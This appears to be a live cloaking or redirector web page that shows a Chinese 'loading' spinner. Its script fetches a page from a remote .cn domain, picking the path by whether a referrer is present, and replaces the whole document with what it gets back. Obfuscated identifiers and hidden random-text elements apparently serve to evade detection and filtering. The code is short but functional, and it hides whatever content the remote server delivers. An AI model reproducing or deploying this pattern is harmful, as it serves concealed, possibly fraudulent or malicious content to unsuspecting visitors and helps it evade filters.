<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .dancaMYsc {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .dancaMYsc .dlbiWVDGKww {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .dancaMYsc .content {
            line-height: 50px;
            text-align: center
        }

        .dancaMYsc .img {
            width: 100%
        }

        .dancaMYsc .RDD8oY8QK4 {
            text-align: center
        }

        .dancaMYsc .RDD8oY8QK4 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .dancaMYsc .RDD8oY8QK4 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .dancaMYsc .RDD8oY8QK4 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .dancaMYsc .RDD8oY8QK4 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .dancaMYsc .RDD8oY8QK4 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .dancaMYsc .RDD8oY8QK4 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .dancaMYsc .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function lpWubop6iA0(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var d4mgz = lpWubop6iA0('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ d4mgz +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ d4mgz +".html?a=share";
		}
		
        gI8Z9P=url+"#"+new Date().getTime();
        gI8Z9P && function() {
            $.get(gI8Z9P, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >lcw4b990iZ3AtZcekqETEWKdeWINrfBCuZowajmHFElDq</li>
<h1 style='display:none' >w8dEm7qi2rjUnfWsalz0Eb3Avto2NoFUx2Sgz4ThfWDcMb9r5djknzPQpDqvJIQ5jakoaKSEw3Zg</h1>
<ul style='display:none' >Pwrw9tlbE2skXYbyK6bdaR5TYswQkPZkgRcbmJaDxR23t9NvIqJvfjHs0EkYcNOafiVG1</ul>
<span style='display:none'>LfALPjSgVmtz5G4CNPxRPQYT7Q5UMUEgbAK</span>
<h1 style='display:none' >w8dEm7qi2rjUnfWsalz0Eb3Avto2NoFUx2Sgz4ThfWDcMb9r5djknzPQpDqvJIQ5jakoaKSEw3Zg</h1>
<h1 style='display:none' >w8dEm7qi2rjUnfWsalz0Eb3Avto2NoFUx2Sgz4ThfWDcMb9r5djknzPQpDqvJIQ5jakoaKSEw3Zg</h1>
<h1 style='display:none' >w8dEm7qi2rjUnfWsalz0Eb3Avto2NoFUx2Sgz4ThfWDcMb9r5djknzPQpDqvJIQ5jakoaKSEw3Zg</h1>
<p  style='display:none'>AMn71yeX8k5FDkosghH67eGluYlICNmL5282Dq6nsuQkN10PFf7DsdIm3E9</p>
<div style='display:none'>pnX9Kxj4C8Q6bnZ1au19bnSC</div>
<p  style='display:none'>AMn71yeX8k5FDkosghH67eGluYlICNmL5282Dq6nsuQkN10PFf7DsdIm3E9</p><div class="dancaMYsc">
    <div class="dlbiWVDGKww">
        <div class="RDD8oY8QK4">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>yECX6RvNxMzEfoG45q0gJGjQLcdCdKhldAvTffnwP7wWPHRGKh9rhz1DnoCmb7dgUPXq5oKgZBVjq9UGXIIkWqTs</a>
<h1 style='display:none' >kmv4NPUMKtpIEbupA8vQjvEYpLhUNkpXDkXPdYBy3u3wMNgEfgMs42iaFQJwF58iUOZ39SCbx8hn5bIkTdD0viumyCVSUO8o6brER</h1>
<div style='display:none'>xMbizJdQmV2kgH4pvCqLWi</div>
<span style='display:none'>uUPgO5epFAsJf</span>
<a  href='#' style='display:none'>yECX6RvNxMzEfoG45q0gJGjQLcdCdKhldAvTffnwP7wWPHRGKh9rhz1DnoCmb7dgUPXq5oKgZBVjq9UGXIIkWqTs</a></body>
</html>